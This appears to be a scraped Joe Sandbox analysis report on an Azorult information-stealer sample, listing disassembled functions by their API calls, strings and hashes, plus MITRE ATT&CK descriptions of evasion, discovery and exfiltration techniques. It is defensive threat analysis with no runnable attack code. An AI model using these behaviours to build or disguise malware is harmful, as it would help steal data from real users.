API String ID: 3448371392-3650661790
Opcode ID: 2d5d7d5c0cd455ac35e8538cbdb34896a68ba153585d133ff5677ccfd955861b
Instruction ID: 1a8257de2d60cbb0d3980c7fc3a6a2139cbe43d2aa84506a9aa105e6b37338cb
Opcode Fuzzy Hash: 2d5d7d5c0cd455ac35e8538cbdb34896a68ba153585d133ff5677ccfd955861b
Instruction Fuzzy Hash: 1B414231904248AFDB01FFA2D852ACDBBB9EF45309F51447BF500B76A2D63CAE058B25

Function 004112C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

Strings

.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 8b025c809ca5fcf52eb203aa6c1f0ec38d1a9fc9c4deca7b9c8dce6ee129aaff
Instruction ID: e7bb21d7818b23da26e47d5e8aee7b9a5bdfdedc2a4558b21973e4c2dc324f20
Opcode Fuzzy Hash: 8b025c809ca5fcf52eb203aa6c1f0ec38d1a9fc9c4deca7b9c8dce6ee129aaff
Instruction Fuzzy Hash: 01413571904108AFDB01FFA2D842ACDBBB9EF45309F51447BF505B36A2D63CAE068A24

Function 004112C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

Strings

.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: c1a497b4b0d046b719842a9b981a532eae9f015e020314dad747ec1315daf45e
Instruction ID: 8afa6536208aa5b6f57682845dada9e2518f3e9b5e83f9eef4c4991f65faefc0
Opcode Fuzzy Hash: c1a497b4b0d046b719842a9b981a532eae9f015e020314dad747ec1315daf45e
Instruction Fuzzy Hash: 7F414631900108AFDB01FF92D842ACDFBB9EF44309F50447BF504B36A2D63CAE058A14

Function 0041102C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411078
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4

Strings

%TEMP%, xrefs: 004110B3
.tmp, xrefs: 00411093

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 7334c5f461cf658640640d1d52cc0bd0a3ff0b1e0655c4320245804e77c3ea22
Instruction ID: 086439bef84ae03ebcf91c6f71c22103effc3d3d1ef1d95b9ffc13b6feb758dd
Opcode Fuzzy Hash: 7334c5f461cf658640640d1d52cc0bd0a3ff0b1e0655c4320245804e77c3ea22
Instruction Fuzzy Hash: 53315531904108AFDB01FFA1D942ADDBBB9EF49304F50447BF504B36A2D738AE069A58

Function 00411030 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00411078
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4

Strings

%TEMP%, xrefs: 004110B3
.tmp, xrefs: 00411093

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 4f8e67243287949893c35c2c73810bd2e217d777a31600725d2df3b5b3d23b75
Instruction ID: c9e68ca033382928e780bbb2ca05a045859d404701f4d2a11d4424a3b4ff7e89
Opcode Fuzzy Hash: 4f8e67243287949893c35c2c73810bd2e217d777a31600725d2df3b5b3d23b75
Instruction Fuzzy Hash: FA313531900109AEDB01FF91D942ADDBBB9EF48305F50457BF504B26A2D738AE059A58

Function 00415D60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesA,00000000,00415E07,?,-00000001,?,?,?,00415F5F,Video Info,?,004160A8,?,GetRAM: ,?), ref: 00415D8E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00415D94

Strings

user32.dll, xrefs: 00415D89
EnumDisplayDevicesA, xrefs: 00415D84

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumDisplayDevicesA$user32.dll
API String ID: 2574300362-2278183399
Opcode ID: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
Instruction ID: 9dd9bdf3a8bde6cf78cd03fc344b6578603246f1cfb7de35a5983435c2d557c6
Opcode Fuzzy Hash: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
Instruction Fuzzy Hash: 3901A571A00708AEE7209F62CC41BDB77ADEBC5714F5180BAF508E2180DA785F408A69

Function 00401870 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Function 0040E79C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C), ref: 0040E824
DeleteFileW.KERNEL32(00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C,00000001,?), ref: 0040E866

Strings

%TEMP%\curbuf.dat, xrefs: 0040E808, 0040E830, 0040E853

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: File$AllocCopyDeleteString
String ID: %TEMP%\curbuf.dat
API String ID: 5292005-3767633259
Opcode ID: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
Instruction ID: 82a9ed53c2a697d02335697899508965461685f21aee0589c72fe3466f83eb79
Opcode Fuzzy Hash: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
Instruction Fuzzy Hash: 4D211271A00209EBDB00FBA6D94299EB7B8EF44309F50897BF400B32D1D738AE11965D

Function 0040246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Strings

^, xrefs: 00402496

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: ^
API String ID: 2227675388-551292248
Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UoktqWamLR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Azorult

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
UoktqWamLR.exe

Function 023530DA Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 374
nativethreadprocessCOMMON

Function 02353113 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 369
nativethreadprocessCOMMON

Function 004A7213 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
nativememoryCOMMON

Function 004FC731 Relevance: 331.0, APIs: 220, Instructions: 964
COMMON

Function 004F9F8B Relevance: 201.9, APIs: 111, Strings: 4, Instructions: 687
librarymemoryloaderCOMMON

Function 004FB547 Relevance: 150.8, APIs: 100, Instructions: 833
COMMON

Function 004FF318 Relevance: 109.1, APIs: 61, Strings: 1, Instructions: 581
COMMON

Function 004FD671 Relevance: 105.4, APIs: 58, Strings: 2, Instructions: 409
memoryCOMMON

Function 004FDCA4 Relevance: 100.2, APIs: 55, Strings: 2, Instructions: 412
memoryCOMMON

Function 004FC4F4 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 160
COMMON

Function 004FBEF5 Relevance: 37.7, APIs: 25, Instructions: 204
COMMON

Function 004FB0FC Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 130
memoryCOMMON

Function 004FA88C Relevance: 28.7, APIs: 19, Instructions: 152
COMMON

Function 004FAF77 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
COMMON

Function 004FFBC3 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON